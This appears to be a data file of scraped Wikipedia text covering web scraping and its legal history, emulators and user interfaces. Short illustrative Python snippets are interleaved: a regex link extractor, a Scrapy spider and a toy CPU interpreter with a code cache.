396 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-9 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing. Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
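The regular-expression technique described above (the grep-style approach) can be sketched with the requests and re modules. The target URL is just an illustrative example, and the pattern is deliberately naive; robust extraction would normally go through an HTML parser instead.

# Hedged sketch: regex-based link extraction, the simplest scraping technique mentioned above.
import re
import requests

response = requests.get("https://en.wikipedia.org/wiki/Web_scraping", timeout=10)
response.raise_for_status()

# naive pattern for href attribute values; adequate for a sketch, brittle on messy markup
links = re.findall(r'href="([^"]+)"', response.text)
print(len(links), "links found")
print(links[:5])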
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
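Referring back to the tool list earlier in this passage, the following is a hedged sketch of the same kind of extraction expressed as a Scrapy spider. Scrapy is not installed at the top of this notebook, and the practice site and selectors are illustrative assumptions only.
import scrapy
class QuoteSpider(scrapy.Spider):
    name = "example"
    start_urls = ["https://quotes.toscrape.com/"]   # public practice site used as a placeholder
    def parse(self, response):
        # CSS selectors walk the parsed page; the yielded dicts can be exported with
        #   scrapy runspider this_file.py -o quotes.csv
        for quote in response.css("div.quote"):
            yield {
                "text": quote.css("span.text::text").get(),
                "author": quote.css("small.author::text").get(),
            }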
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping is a violation of contract law. It also violates the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
397 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Emulator | In computing, an emulator is hardware or software that enables one computer system (called the host) to behave like another computer system (called the guest). An emulator typically enables the host system to run software or use peripheral devices designed for the guest system. Emulation refers to the ability of a computer program in an electronic device to emulate (or imitate) another program or device. Many printers, for example, are designed to emulate HP LaserJet printers because so much software is written for HP printers. If a non-HP printer emulates an HP printer, any software written for a real HP printer will also run in the non-HP printer emulation and produce equivalent printing. Since at least the 1990s, many video game enthusiasts and hobbyists have used emulators to play classic arcade games from the 1980s using the games' original 1980s machine code and data, which is interpreted by a current-era system, and to emulate old video game consoles (see video game console emulator). A hardware emulator is an emulator which takes the form of a hardware device. Examples include the DOS-compatible card installed in some 1990s-era Macintosh computers, such as the Centris 610 or Performa 630, that allowed them to run personal computer (PC) software programs and field-programmable gate array-based hardware emulators. The Church-Turing thesis implies that theoretically, any operating environment can be emulated within any other environment, assuming memory limitations are ignored. However, in practice, it can be quite difficult, particularly when the exact behavior of the system to be emulated is not documented and has to be deduced through reverse engineering. It also says nothing about timing constraints; if the emulator does not perform as quickly as it did using the original hardware, the software inside the emulation may run much more slowly (possibly triggering timer interrupts that alter behavior). "Can a Commodore 64 emulate MS-DOS? Yes, it's possible for a Commodore 64 to emulate an IBM PC which uses MS-DOS , in the same sense that it's possible to bail out Lake Michigan with a teaspoon. Most emulators just emulate a hardware architecture—if operating system firmware or software is required for the desired software, it must be provided as well (and may itself be emulated). Both the OS and the software will then be interpreted by the emulator, rather than being run by native hardware. Apart from this interpreter for the emulated binary machine's language, some other hardware (such as input or output devices) must be provided in virtual form as well; for example, if writing to a specific memory location should influence what is displayed on the screen, then this would need to be emulated. While emulation could, if taken to the extreme, go down to the atomic level, basing its output on a simulation of the actual circuitry from a virtual power source, this would be a highly unusual solution. Emulators typically stop at a simulation of the documented hardware specifications and digital logic. Sufficient emulation of some hardware platforms requires extreme accuracy, down to the level of individual clock cycles, undocumented features, unpredictable analog elements, and implementation bugs. 
This is particularly the case with classic home computers such as the Commodore 64, whose software often depends on highly sophisticated low-level programming tricks invented by game programmers and the "demoscene". In contrast, some other platforms have had very little use of direct hardware addressing, such as an emulator for the PlayStation 4. 2 In these cases, a simple compatibility layer may suffice. This translates system calls for the foreign system into system calls for the host system e.g., the Linux compatibility layer used on BSD to run closed source Linux native software on FreeBSD and NetBSD. 3 For example, while the Nintendo 64 graphic processor was fully programmable, most games used one of a few pre-made programs, which were mostly self-contained and communicated with the game via FIFO; therefore, many emulators do not emulate the graphic processor at all, but simply interpret the commands received from the CPU as the original program would. Developers of software for embedded systems or video game consoles often design their software on especially accurate emulators called simulators before trying it on the real hardware. This is so that software can be produced and tested before the final hardware exists in large quantities, so that it can be tested without taking the time to copy the program to be debugged at a low level and without introducing the side effects of a debugger. In many cases, the simulator is actually produced by the company providing the hardware, which theoretically increases its accuracy. Math co-processor emulators allow programs compiled with math instructions to run on machines that do not have the co-processor installed, but the extra work done by the CPU may slow the system down. If a math coprocessor is not installed or present on the CPU, when the CPU executes any co-processor instruction it will make a determined interrupt (coprocessor not available), calling the math emulator routines. When the instruction is successfully emulated, the program continues executing. Logic simulation is the use of a computer program to simulate the operation of a digital circuit such as a processor. 4 This is done after a digital circuit has been designed in logic equations, but before the circuit is fabricated in hardware. Functional simulation is the use of a computer program to simulate the execution of a second computer program written in symbolic assembly language or compiler language, rather than in binary machine code. By using a functional simulator, programmers can execute and trace selected sections of source code to search for programming errors (bugs), without generating binary code. This is distinct from simulating execution of binary code, which is software emulation. The first functional simulator was written by Autonetics about 1960 citation needed for testing assembly language programs for later execution in military computer D 17B. This made it possible for flight programs to be written, executed, and tested before D 17B computer hardware had been built. Autonetics also programmed a functional simulator for testing flight programs for later execution in the military computer D 37C. Video game console emulators are programs that allow a personal computer or video game console to emulate another video game console. They are most often used to play older 1980s to 2000s-era video games on modern personal computers and more contemporary video game consoles. 
They are also used to translate games into other languages, to modify existing games, and in the development process of "home brew" DIY demos and in the creation of new games for older systems. The Internet has helped in the spread of console emulators, as most - if not all - would be unavailable for sale in retail outlets. Examples of console emulators that have been released in the last few decades are: RPCS3, Dolphin, Cemu, PCSX2, PPSSPP, ZSNES, Citra, ePSXe, Project64, Visual Boy Advance, Nestopia, and Yuzu. Due to their popularity, emulators have been impersonated by malware. Most of these emulators are for video game consoles like the Xbox 360, Xbox One, Nintendo 3DS, etc. Generally such emulators make currently impossible claims such as being able to run Xbox One and Xbox 360 games in a single program. 5 As computers and global computer networks continued to advance and emulator developers grew more skilled in their work, the length of time between the commercial release of a console and its successful emulation began to shrink. Fifth generation consoles such as Nintendo 64, PlayStation and sixth generation handhelds, such as the Game Boy Advance, saw significant progress toward emulation during their production. This led to an effort by console manufacturers to stop unofficial emulation, but consistent failures such as Sega v. Accolade 977 F.2d 1510 (9th Cir. 1992), Sony Computer Entertainment, Inc. v. Connectix Corporation 203 F.3d 596 (2000), and Sony Computer Entertainment America v. Bleem 214 F.3d 1022 (2000), 6 have had the opposite effect. According to all legal precedents, emulation is legal within the United States. However, unauthorized distribution of copyrighted code remains illegal, according to both country-specific copyright and international copyright law under the Berne Convention. 7 better source needed Under United States law, obtaining a dumped copy of the original machine's BIOS is legal under the ruling Lewis Galoob Toys, Inc. v. Nintendo of America, Inc., 964 F.2d 965 (9th Cir. 1992) as fair use as long as the user obtained a legally purchased copy of the machine. To mitigate this however, several emulators for platforms such as Game Boy Advance are capable of running without a BIOS file, using high-level emulation to simulate BIOS subroutines at a slight cost in emulation accuracy. citation needed Terminal emulators are software programs that provide modern computers and devices interactive access to applications running on mainframe computer operating systems or other host systems such as HP-UX or OpenVMS. Terminals such as the IBM 3270 or VT100 and many others are no longer produced as physical devices. Instead, software running on modern operating systems simulates a "dumb" terminal and is able to render the graphical and text elements of the host application, send keystrokes and process commands using the appropriate terminal protocol. Some terminal emulation applications include Attachmate Reflection, IBM Personal Communications, and Micro Focus Rumba. Other types of emulators include: Typically, an emulator is divided into modules that correspond roughly to the emulated computer's subsystems. Most often, an emulator will be composed of the following modules: Buses are often not emulated, either for reasons of performance or simplicity, and virtual peripherals communicate directly with the CPU or the memory subsystem. 
It is possible for the memory subsystem emulation to be reduced to simply an array of elements each sized like an emulated word; however, this model fails very quickly as soon as any location in the computer's logical memory does not match physical memory. This clearly is the case whenever the emulated hardware allows for advanced memory management (in which case, the MMU logic can be embedded in the memory emulator, made a module of its own, or sometimes integrated into the CPU simulator). Even if the emulated computer does not feature an MMU, though, there are usually other factors that break the equivalence between logical and physical memory: many (if not most) architectures offer memory-mapped I O; even those that do not often have a block of logical memory mapped to ROM, which means that the memory-array module must be discarded if the read-only nature of ROM is to be emulated. Features such as bank switching or segmentation may also complicate memory emulation. As a result, most emulators implement at least two procedures for writing to and reading from logical memory, and it is these procedures' duty to map every access to the correct location of the correct object. On a base-limit addressing system where memory from address 0 to address ROMSIZE 1 is read-only memory, while the rest is RAM, something along the line of the following procedures would be typical: The CPU simulator is often the most complicated part of an emulator. Many emulators are written using "pre-packaged" CPU simulators, in order to concentrate on good and efficient emulation of a specific machine. The simplest form of a CPU simulator is an interpreter, which is a computer program that follows the execution flow of the emulated program code and, for every machine code instruction encountered, executes operations on the host processor that are semantically equivalent to the original instructions. This is made possible by assigning a variable to each register and flag of the simulated CPU. The logic of the simulated CPU can then more or less be directly translated into software algorithms, creating a software re-implementation that basically mirrors the original hardware implementation. The following example illustrates how CPU simulation can be accomplished by an interpreter. In this case, interrupts are checked-for before every instruction executed, though this behavior is rare in real emulators for performance reasons (it is generally faster to use a subroutine to do the work of an interrupt). Interpreters are very popular as computer simulators, as they are much simpler to implement than more time-efficient alternative solutions, and their speed is more than adequate for emulating computers of more than roughly a decade ago on modern machines. However, the speed penalty inherent in interpretation can be a problem when emulating computers whose processor speed is on the same order of magnitude as the host machine dubious discuss . Until not many years ago, emulation in such situations was considered completely impractical by many dubious discuss . What allowed breaking through this restriction were the advances in dynamic recompilation techniques dubious discuss . 
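The passage above twice points at example code that did not survive the scrape ("something along the line of the following procedures" and "The following example illustrates how CPU simulation can be accomplished by an interpreter"). The sketch below is not the original article's code; it is a hedged Python illustration of both ideas at once: memory-access procedures that route every read and write through one place so a read-only region can be enforced, and an interpreter loop that checks for a pending interrupt before each instruction. ROMSIZE, the opcode values and the register names are invented for the illustration.
# Hedged sketch (not the original article's example): a toy machine with a
# read-only region at the bottom of the address space and an interpreter
# that checks for pending interrupts before executing each instruction.
ROMSIZE = 0x1000                       # invented size of the read-only region

class ToyMachine:
    def __init__(self, rom_bytes):
        self.rom = list(rom_bytes) + [0] * (ROMSIZE - len(rom_bytes))
        self.ram = [0] * 0xF000
        self.acc = 0                   # single accumulator register
        self.pc = 0                    # program counter
        self.interrupt_pending = False

    # Memory-access procedures: every access goes through these two functions,
    # so the ROM/RAM split (and, in a real emulator, MMU logic or memory-mapped
    # I/O) lives in one place.
    def read(self, addr):
        return self.rom[addr] if addr < ROMSIZE else self.ram[addr - ROMSIZE]

    def write(self, addr, value):
        if addr < ROMSIZE:
            return                     # writes to the ROM region are silently ignored
        self.ram[addr - ROMSIZE] = value & 0xFF

    # Interpreter: fetch, decode, execute, one guest instruction at a time.
    def step(self):
        if self.interrupt_pending:     # checked before every instruction
            self.interrupt_pending = False
            self.pc = self.read(0)     # invented convention: interrupt vector at address 0
            return
        opcode = self.read(self.pc); self.pc += 1
        if opcode == 0x01:             # LOAD immediate into the accumulator
            self.acc = self.read(self.pc); self.pc += 1
        elif opcode == 0x02:           # STORE accumulator to an address
            self.write(self.read(self.pc), self.acc); self.pc += 1
        elif opcode == 0x03:           # ADD immediate to the accumulator
            self.acc = (self.acc + self.read(self.pc)) & 0xFF; self.pc += 1
        # any other opcode is treated as a no-op in this toy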
Simple a priori translation of emulated program code into code runnable on the host architecture is usually impossible because of several reasons: Various forms of dynamic recompilation, including the popular Just In Time compiler (JIT) technique, try to circumvent these problems by waiting until the processor control flow jumps into a location containing untranslated code, and only then ("just in time") translates a block of the code into host code that can be executed. The translated code is kept in a code cache dubious discuss , and the original code is not lost or affected; this way, even data segments can be (meaninglessly) translated by the recompiler, resulting in no more than a waste of translation time. Speed may not be desirable as some older games were not designed with the speed of faster computers in mind. A game designed for a 30 MHz PC with a level timer of 300 game seconds might only give the player 30 seconds on a 300 MHz PC. Other programs, such as some DOS programs, may not even run on faster computers. Particularly when emulating computers which were "closed-box", in which changes to the core of the system were not typical, software may use techniques that depend on specific characteristics of the computer it ran on (e.g. its CPU's speed) and thus precise control of the speed of emulation is important for such applications to be properly emulated. Most emulators do not, as mentioned earlier, emulate the main system bus; each I O device is thus often treated as a special case, and no consistent interface for virtual peripherals is provided. This can result in a performance advantage, since each I O module can be tailored to the characteristics of the emulated device; designs based on a standard, unified I O API can, however, rival such simpler models, if well thought-out, and they have the additional advantage of "automatically" providing a plug-in service through which third-party virtual devices can be used within the emulator. A unified I O API may not necessarily mirror the structure of the real hardware bus: bus design is limited by several electric constraints and a need for hardware concurrency management that can mostly be ignored in a software implementation. Even in emulators that treat each device as a special case, there is usually a common basic infrastructure for: Emulation is one strategy in pursuit of digital preservation and combating obsolescence. Emulation focuses on recreating an original computer environment, which can be time-consuming and difficult to achieve, but valuable because of its ability to maintain a closer connection to the authenticity of the digital object, operating system, or even gaming platform. 8 Emulation addresses the original hardware and software environment of the digital object, and recreates it on a current machine. 9 The emulator allows the user to have access to any kind of application or operating system on a current platform, while the software runs as it did in its original environment. 10 Jeffery Rothenberg, an early proponent of emulation as a digital preservation strategy states, "the ideal approach would provide a single extensible, long-term solution that can be designed once and for all and applied uniformly, automatically, and in organized synchrony (for example, at every refresh cycle) to all types of documents and media". 11 He further states that this should not only apply to out of date systems, but also be upwardly mobile to future unknown systems. 
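To make the code-cache idea above concrete, here is a hedged sketch of "translate on first jump, reuse ever after". It is only an analogy: the "translation" wraps the toy interpreter from the previous sketch in a Python closure, whereas a real dynamic recompiler would emit host machine code for the block.
# Hedged sketch of the code cache behind dynamic recompilation: guest code is
# only "translated" the first time control jumps into it, and the cached
# result is reused on every later visit.
code_cache = {}

def translate_block(machine, start_pc, max_len=16):
    def run_block():
        machine.pc = start_pc
        for _ in range(max_len):       # execute a bounded basic block
            machine.step()
    return run_block                   # stand-in for an emitted host-code block

def execute_at(machine, pc):
    if pc not in code_cache:           # translate just in time, exactly once
        code_cache[pc] = translate_block(machine, pc)
    code_cache[pc]()                   # reuse the cached translation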
12 Practically speaking, when a certain application is released in a new version, rather than address compatibility issues and migration for every digital object created in the previous version of that application, one could create an emulator for the application, allowing access to all of said digital objects. Because of its primary use of digital formats, new media art relies heavily on emulation as a preservation strategy. Artists such as Cory Arcangel specialize in resurrecting obsolete technologies in their artwork and recognize the importance of a decentralized and deinstitutionalized process for the preservation of digital culture. In many cases, the goal of emulation in new media art is to preserve a digital medium so that it can be saved indefinitely and reproduced without error, so that there is no reliance on hardware that ages and becomes obsolete. The paradox is that the emulation and the emulator have to be made to work on future computers. 13 Emulation techniques are commonly used during the design and development of new systems. It eases the development process by providing the ability to detect, recreate and repair flaws in the design even before the system is actually built. 14 It is particularly useful in the design of multi-core systems, where concurrency errors can be very difficult to detect and correct without the controlled environment provided by virtual hardware. 15 This also allows the software development to take place before the hardware is ready, 16 thus helping to validate design decisions and give a little more control. The word "emulator" was coined in 1963 at IBM 17 during development of the NPL (IBM System 360) product line, using a "new combination of software, microcode, and hardware". 18 They discovered that simulation using additional instructions implemented in microcode and hardware, instead of software simulation using only standard instructions, to execute programs written for earlier IBM computers dramatically increased simulation speed. Earlier, IBM provided simulators for, e.g., the 650 on the 705. 19 In addition to simulators, IBM had compatibility features on the 709 and 7090, 20 for which it provided the IBM 709 computer with a program to run legacy programs written for the IBM 704 on the 709 and later on the IBM 7090. This program used the instructions added by the compatibility feature 21 to trap instructions requiring special handling; all other 704 instructions ran the same on a 7090. The compatibility feature on the 1410 22 only required setting a console toggle switch, not a support program. In 1963, when microcode was first used to speed up this simulation process, IBM engineers coined the term "emulator" to describe the concept. In the 2000s, it has become common to use the word "emulate" in the context of software. However, before 1980, "emulation" referred only to emulation with a hardware or microcode assist, while "simulation" referred to pure software emulation. 23 For example, a computer specially built for running programs designed for another architecture is an emulator. In contrast, a simulator could be a program which runs on a PC, so that old Atari games can be simulated on it. Purists continue to insist on this distinction, but currently the term "emulation" often means the complete imitation of a machine executing binary code while "simulation" often refers to computer simulation, where a computer program is used to simulate an abstract model. 
Computer simulation is used in virtually every scientific and engineering domain and Computer Science is no exception, with several projects simulating abstract models of computer systems, such as network simulation, which both practically and semantically differs from network emulation. 24 Hardware virtualization is the virtualization of computers as complete hardware platforms, certain logical abstractions of their components, or only the functionality required to run various operating systems. Virtualization hides the physical characteristics of a computing platform from the users, presenting instead an abstract computing platform. 25 26 At its origins, the software that controlled virtualization was called a "control program", but the terms "hypervisor" or "virtual machine monitor" became preferred over time. 27 Each hypervisor can manage or run multiple virtual machines. |
398 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/User_interface | In the industrial design field of human computer interaction, a user interface (UI) is the space where interactions between humans and machines occur. The goal of this interaction is to allow effective operation and control of the machine from the human end, while the machine simultaneously feeds back information that aids the operators' decision-making process. Examples of this broad concept of user interfaces include the interactive aspects of computer operating systems, hand tools, heavy machinery operator controls and process controls. The design considerations applicable when creating user interfaces are related to, or involve such disciplines as, ergonomics and psychology. Generally, the goal of user interface design is to produce a user interface that makes it easy, efficient, and enjoyable (user-friendly) to operate a machine in the way which produces the desired result (i.e. maximum usability). This generally means that the operator needs to provide minimal input to achieve the desired output, and also that the machine minimizes undesired outputs to the user. User interfaces are composed of one or more layers, including a human-machine interface (HMI) that typically interfaces machines with physical input hardware (such as keyboards, mice, or game pads) and output hardware (such as computer monitors, speakers, and printers). A device that implements an HMI is called a human interface device (HID). User interfaces that dispense with the physical movement of body parts as an intermediary step between the brain and the machine use no input or output devices except electrodes alone; they are called brain computer interfaces (BCIs) or brain machine interfaces (BMIs). Other terms for human machine interfaces are man machine interface (MMI) and, when the machine in question is a computer, human computer interface. Additional UI layers may interact with one or more human senses, including: tactile UI (touch), visual UI (sight), auditory UI (sound), olfactory UI (smell), equilibria UI (balance), and gustatory UI (taste). Composite user interfaces (CUIs) are UIs that interact with two or more senses. The most common CUI is a graphical user interface (GUI), which is composed of a tactile UI and a visual UI capable of displaying graphics. When sound is added to a GUI, it becomes a multimedia user interface (MUI). There are three broad categories of CUI: standard, virtual and augmented. Standard CUI use standard human interface devices like keyboards, mice, and computer monitors. When the CUI blocks out the real world to create a virtual reality, the CUI is virtual and uses a virtual reality interface. When the CUI does not block out the real world and creates augmented reality, the CUI is augmented and uses an augmented reality interface. When a UI interacts with all human senses, it is called a qualia interface, named after the theory of qualia. citation needed CUI may also be classified by how many senses they interact with as either an X-sense virtual reality interface or X-sense augmented reality interface, where X is the number of senses interfaced with. 
